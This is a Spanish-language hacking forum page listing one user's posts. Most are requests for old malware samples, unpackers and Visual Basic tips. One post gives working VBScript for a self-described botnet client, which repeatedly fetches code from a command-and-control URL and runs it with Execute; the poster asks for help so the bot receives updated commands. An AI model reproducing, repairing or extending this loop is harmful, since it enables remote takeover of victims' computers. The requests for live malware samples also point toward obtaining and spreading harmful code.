elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: [1] 2
1  Seguridad Informática / Análisis y Diseño de Malware / Unpacker para PETite v.2.3 en: 5 Julio 2020, 01:49 am
Estaba viendo como analizar el código fuente de W32 Lechuck, me di cuenta de que tenia un packer.
Descargue una herramienta llamada RDG Packer Detector para saber cual era, y empezé a buscar un unpacker para verlo con el vbdecompiler. Encontré 2 versiones diferentes del unpacker (Usando la Wayback Machine):

http://web.archive.org/web/20160324132204/http://exetools.com/files/unpackers/win/unpetite.zip
http://web.archive.org/web/20160324132204/http://exetools.com/files/unpackers/win/enlarge1.zip

Pero ninguno de estos funcionó.

Alguien conoce algun otro unpacker?
Gracias de antemano. :)
2  Seguridad Informática / Análisis y Diseño de Malware / [Perdon si no deberia ir aqui] Servidor SMTP para pruebas de malware en: 14 Febrero 2020, 05:54 am
Hola! Necesito ayuda. Quiero hacer un servidor SMTP para hacer pruebas con distintos tipos de malware, pero busque y no me funciono, estoy usando (de paso para probarlo) Windows Server 2000.
Alguna sugerencia? Gracias de antemano.

EDIT: Quiero usarlo en Outlook Express

PD: Puse el tema aqui ya que voy a usar este servidor para analizar como funcionan distintos virus
3  Programación / Programación Visual Basic / Melting Screen en: 9 Noviembre 2019, 07:59 am
Una pregunta: ¿Conocen alguna manera de hacer un efecto de pantalla goteando como el virus melting screen en vb6? Quiero saber cómo funciona

Saludos de antemano
Pd: Intenté decompilar el virus melting screen pero fue en vano :(
4  Seguridad Informática / Análisis y Diseño de Malware / Descargar Malware en: 7 Noviembre 2019, 03:41 am
Alguien puede decirme alguna página de malware de virus antiguos?

Estoy buscando un virus llamado Sobig.A, además de otros virus.

Cualquier ayuda es bien recibida :)
5  Programación / Programación Visual Basic / Usar sockets en vb6 sin registrar en: 1 Noviembre 2019, 00:38 am
Hay alguna forma de utilizar los sockets en vb6 sin registrar el ocx?   :)
Por ejemplo, dejarlo en la carpeta del ejecutable y que lo importe de ahi sin registrarlo, para que no requiera permisos de administrador

Estoy buscando una solucion desde hace semanas y no encuentro nada.  :-\
Alguna idea? Gracias
6  Seguridad Informática / Análisis y Diseño de Malware / [Resuelto] Alguien tiene el virus W32 LeChucK? en: 31 Octubre 2019, 18:43 pm
Desde hace meses que me viene interesando este virus. Quiero analizarlo para ver su funcionamiento.  :D
Nombre Real: Worm_VB.FKO
Alias:
  • Trojan-Downloader.Win32.VB.bbl
  • Generic.dx
  • W32.SillyFDC
  • TR/Dldr.VB.bbl.2
El que tenga informacion sobre como conseguir este virus comente y pase link

Desde ya muchas gracias  ;D
7  Programación / Scripting / Error de XmlHTTP en: 11 Octubre 2019, 23:05 pm
Hola! Tengo un problema con uno de mis proyectos, quiero hacer una botnet vbs pero no funciona como esperaba:
Código:
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set http = CreateObject("Microsoft.XmlHttp")

Do
Set file = fso.OpenTextFile(fso.getSpecialFolder(2) & "\k.tmp", 1, True)
filex = file.readAll
file.Close
http.open "GET", "http://*****.tk/btnet/cmdint.php", False
http.send
If Not(http.responsetext = filex) Then
Set file = fso.OpenTextFile(fso.getSpecialFolder(2) & "\k.tmp", 2, True)
file.Write http.responsetext
file.Close
Execute http.responsetext
End If
Wscript.Sleep 15000
Loop

Cuando se inicia por primera vez, la botnet busca en mi servidor C&C el codigo a ejecutar.
Luego, ejecuta el codigo y lo guarda en un archivo llamado k.tmp
Cuando se repite deberia volver a buscar el codigo en el servidor, y gracias al archivo k.tmp, verificar si el codigo ya se ejecutó antes.

El problema es que cuando ocurre el loop y el archivo de instrucciones del servidor se actualizó, la botnet no recibe el nuevo codigo, sino el anterior  :-\

¿Como puedo solucionarlo?
8  Programación / Scripting / Cambia en algo? en: 10 Octubre 2019, 03:47 am
Me di cuenta que muchas personas en vbs utilizan la siguiente instrucción:
Código:
Set fso = Nothing

¿Cambia en algo que lo ponga? ¿Para que me podría servir?
9  Programación / Programación Visual Basic / ¿Otro MSGBox? en: 5 Octubre 2019, 04:51 am
Hola! Estaba viendo algunos videos del youtube danooct1 cuando de repente vi esto:



Y me gustaria saber como se llamaria a ese MSGBOX, no creo que sea un formulario ya que otros virus usan el mismo diseño, y no me parece que casualmente usen el mismo diseño... :/

Cualquier ayuda es bien recibida :D
10  Programación / Programación Visual Basic / Retornar Aplicación vb6 por línea de comandos en: 2 Octubre 2019, 06:20 am
Hola! Quiero crear una aplicación que reciba argumentos a través de línea de comandos (Creo que con command()) y luego poder imprimir un mensaje a través de CMD. Se puede conseguir?

Gracias de antemano. :)
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines